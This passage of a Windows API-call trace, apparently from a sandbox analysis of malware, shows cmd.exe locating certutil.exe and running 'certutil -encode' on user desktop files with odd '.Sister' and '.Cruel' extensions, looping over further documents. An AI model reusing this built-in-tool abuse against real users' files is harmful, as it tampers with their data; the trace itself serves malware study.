(_String1="certutil", _String2="ERASE") returned -2 [0242.544] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0242.544] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0242.545] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0242.545] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0242.545] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0242.545] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0242.545] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0242.545] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0242.545] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0242.545] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0242.545] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0242.545] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0242.545] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0242.545] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0242.545] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0242.545] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0242.545] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0242.545] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0242.545] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0242.545] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0242.545] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0242.545] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0242.545] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0242.545] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0242.545] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0242.545] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0242.545] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0242.545] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0242.545] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0242.545] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0242.545] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0242.545] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0242.545] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0242.545] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0242.546] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0242.546] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0242.546] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0242.546] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0242.546] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0242.546] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0242.546] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0242.546] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0242.546] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0242.546] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0242.546] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0242.546] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0242.546] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0242.546] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0242.546] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0242.546] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0242.546] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0242.546] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0242.546] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0242.546] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0242.546] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0242.546] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0242.546] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0242.546] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0242.546] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0242.546] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0242.546] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0242.546] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0242.546] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0242.546] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0242.546] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0242.547] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0242.547] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0242.547] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0242.547] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0242.547] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0242.547] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0242.547] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0242.547] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0242.547] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0242.547] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0242.547] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0242.547] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0242.547] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0242.547] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0242.547] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0242.547] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0242.547] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0242.547] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0242.547] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0242.547] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0242.547] ??_V@YAXPEAX@Z () returned 0x1 [0242.547] GetProcessHeap () returned 0x21ed8c70000 [0242.547] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9301390 [0242.547] GetProcessHeap () returned 0x21ed8c70000 [0242.547] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xba) returned 0x21ed92a0320 [0242.548] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0242.548] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0242.548] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0242.548] GetProcessHeap () returned 0x21ed8c70000 [0242.548] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed9311380 [0242.549] SetErrorMode (uMode=0x0) returned 0x0 [0242.549] SetErrorMode (uMode=0x1) returned 0x0 [0242.549] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed9311390, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xa6cf4fdb80*="Desktop") returned 0x17 [0242.549] SetErrorMode (uMode=0x0) returned 0x1 [0242.550] GetProcessHeap () returned 0x21ed8c70000 [0242.550] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9311380, Size=0x52) returned 0x21ed9311380 [0242.550] GetProcessHeap () returned 0x21ed8c70000 [0242.550] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9311380) returned 0x52 [0242.550] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0242.550] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0242.550] GetProcessHeap () returned 0x21ed8c70000 [0242.550] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1bc) returned 0x21ed8d5ed30 [0242.550] GetProcessHeap () returned 0x21ed8c70000 [0242.550] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x368) returned 0x21ed8c78f20 [0242.550] GetProcessHeap () returned 0x21ed8c70000 [0242.550] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c78f20, Size=0x1be) returned 0x21ed8c78f20 [0242.550] GetProcessHeap () returned 0x21ed8c70000 [0242.550] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c78f20) returned 0x1be [0242.550] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0242.550] GetProcessHeap () returned 0x21ed8c70000 [0242.550] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8c790f0 [0242.550] GetProcessHeap () returned 0x21ed8c70000 [0242.550] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c790f0, Size=0x7e) returned 0x21ed8c790f0 [0242.550] GetProcessHeap () returned 0x21ed8c70000 [0242.551] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c790f0) returned 0x7e [0242.551] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0242.551] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0242.551] GetLastError () returned 0x2 [0242.551] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0242.551] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0242.552] GetLastError () returned 0x2 [0242.552] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0242.552] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cdc0 [0242.552] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0242.552] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0242.552] GetLastError () returned 0x2 [0242.552] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cc40 [0242.552] FindClose (in: hFindFile=0x21ed8c7cc40 | out: hFindFile=0x21ed8c7cc40) returned 1 [0242.553] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0242.553] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0242.553] ??_V@YAXPEAX@Z () returned 0x1 [0242.553] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0242.623] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0242.623] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0242.623] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0242.623] GetProcessHeap () returned 0x21ed8c70000 [0242.623] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45e30 [0242.624] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0242.624] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0242.624] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0242.624] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0242.624] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0242.624] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0242.624] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0242.624] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0242.624] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0242.624] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0242.624] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0242.624] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0242.624] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0242.624] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0242.624] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0242.624] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0242.624] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0242.624] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0242.624] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0242.624] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0242.624] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0242.624] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0242.624] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0242.624] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0242.625] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0242.625] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0242.625] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0242.625] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0242.625] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0242.625] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0242.625] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0242.625] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0242.625] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0242.625] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0242.625] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0242.625] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0242.625] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0242.625] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0242.625] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0242.625] GetProcessHeap () returned 0x21ed8c70000 [0242.625] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45e30) returned 1 [0242.625] GetProcessHeap () returned 0x21ed8c70000 [0242.625] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c95520 [0242.625] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0242.625] _get_osfhandle (_FileHandle=1) returned 0x50 [0242.625] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0242.701] _get_osfhandle (_FileHandle=0) returned 0x4c [0242.701] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0242.769] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"PUKKYc6CLfNruQwL4y5O.gif.Sister\" \"PUKKYc6CLfNruQwL4y5O.gif.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"PUKKYc6CLfNruQwL4y5O.gif.Sister\" \"PUKKYc6CLfNruQwL4y5O.gif.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"PUKKYc6CLfNruQwL4y5O.gif.Sister\" \"PUKKYc6CLfNruQwL4y5O.gif.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x1118, dwThreadId=0x12f8)) returned 1 [0242.780] CloseHandle (hObject=0xa4) returned 1 [0242.780] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0242.780] GetProcessHeap () returned 0x21ed8c70000 [0242.780] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0242.780] GetEnvironmentStringsW () returned 0x21ed8d44660* [0242.780] GetProcessHeap () returned 0x21ed8c70000 [0242.780] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0242.781] FreeEnvironmentStringsA (penv="=") returned 1 [0242.781] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0244.582] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0244.582] CloseHandle (hObject=0xa8) returned 1 [0244.582] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0244.582] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0244.583] GetProcessHeap () returned 0x21ed8c70000 [0244.583] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0244.583] GetEnvironmentStringsW () returned 0x21ed8d44660* [0244.583] GetProcessHeap () returned 0x21ed8c70000 [0244.583] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0244.583] FreeEnvironmentStringsA (penv="=") returned 1 [0244.583] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0244.583] GetProcessHeap () returned 0x21ed8c70000 [0244.583] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0244.583] GetEnvironmentStringsW () returned 0x21ed8d44660* [0244.583] GetProcessHeap () returned 0x21ed8c70000 [0244.583] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0244.583] FreeEnvironmentStringsA (penv="=") returned 1 [0244.583] GetProcessHeap () returned 0x21ed8c70000 [0244.584] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95520) returned 1 [0244.584] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0244.584] ??_V@YAXPEAX@Z () returned 0x1 [0244.584] FindNextFileW (in: hFindFile=0x21ed8c7cb20, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98dbd970, ftCreationTime.dwHighDateTime=0x1d5ef98, ftLastAccessTime.dwLowDateTime=0x5ab0e890, ftLastAccessTime.dwHighDateTime=0x1d5eef1, ftLastWriteTime.dwLowDateTime=0x5ab0e890, ftLastWriteTime.dwHighDateTime=0x1d5eef1, nFileSizeHigh=0x0, nFileSizeLow=0x124df, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="qyx1bfBq1UB8.odt.Sister", cAlternateFileName="")) returned 1 [0244.584] GetProcessHeap () returned 0x21ed8c70000 [0244.584] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45380, Size=0x462) returned 0x21ed8d45380 [0244.584] GetProcessHeap () returned 0x21ed8c70000 [0244.584] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45380) returned 0x462 [0244.584] GetProcessHeap () returned 0x21ed8c70000 [0244.584] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d69aa0 [0244.584] GetProcessHeap () returned 0x21ed8c70000 [0244.584] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d69aa0, Size=0x58) returned 0x21ed8d69aa0 [0244.584] GetProcessHeap () returned 0x21ed8c70000 [0244.584] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d69aa0) returned 0x58 [0244.584] GetProcessHeap () returned 0x21ed8c70000 [0244.584] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d69b10 [0244.584] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0244.584] GetProcessHeap () returned 0x21ed8c70000 [0244.584] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x40) returned 0x21ed8c7bfd0 [0244.584] ??_V@YAXPEAX@Z () returned 0x1 [0244.584] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0244.585] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7ca60 [0244.585] FindClose (in: hFindFile=0x21ed8c7ca60 | out: hFindFile=0x21ed8c7ca60) returned 1 [0244.585] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cc40 [0244.585] FindClose (in: hFindFile=0x21ed8c7cc40 | out: hFindFile=0x21ed8c7cc40) returned 1 [0244.585] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xbc0c04bb, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xbc0c04bb, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7d0c0 [0244.585] FindClose (in: hFindFile=0x21ed8c7d0c0 | out: hFindFile=0x21ed8c7d0c0) returned 1 [0244.586] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\qyx1bfBq1UB8.odt.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98dbd970, ftCreationTime.dwHighDateTime=0x1d5ef98, ftLastAccessTime.dwLowDateTime=0x5ab0e890, ftLastAccessTime.dwHighDateTime=0x1d5eef1, ftLastWriteTime.dwLowDateTime=0x5ab0e890, ftLastWriteTime.dwHighDateTime=0x1d5eef1, nFileSizeHigh=0x0, nFileSizeLow=0x124df, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="qyx1bfBq1UB8.odt.Sister", cAlternateFileName="QYX1BF~1.SIS")) returned 0x21ed8c7cdc0 [0244.586] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0244.586] _wcsnicmp (_String1="QYX1BF~1.SIS", _String2="qyx1bfBq1UB8.odt.Sister", _MaxCount=0x17) returned 28 [0244.586] malloc (_Size=0x1ff9c) returned 0x21ed97dfbb0 [0244.586] ??_V@YAXPEAX@Z () returned 0x21ed97dfbb0 [0244.586] GetProcessHeap () returned 0x21ed8c70000 [0244.586] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x32) returned 0x21ed8cc86d0 [0244.586] ??_V@YAXPEAX@Z () returned 0x1 [0244.586] ??_V@YAXPEAX@Z () returned 0x1 [0244.586] GetProcessHeap () returned 0x21ed8c70000 [0244.586] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d69b10, Size=0x1f0) returned 0x21ed8d69b10 [0244.587] GetProcessHeap () returned 0x21ed8c70000 [0244.587] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d69b10) returned 0x1f0 [0244.587] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0244.587] _get_osfhandle (_FileHandle=1) returned 0x50 [0244.587] GetFileType (hFile=0x50) returned 0x2 [0244.587] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0244.587] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0244.659] _get_osfhandle (_FileHandle=1) returned 0x50 [0244.659] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: 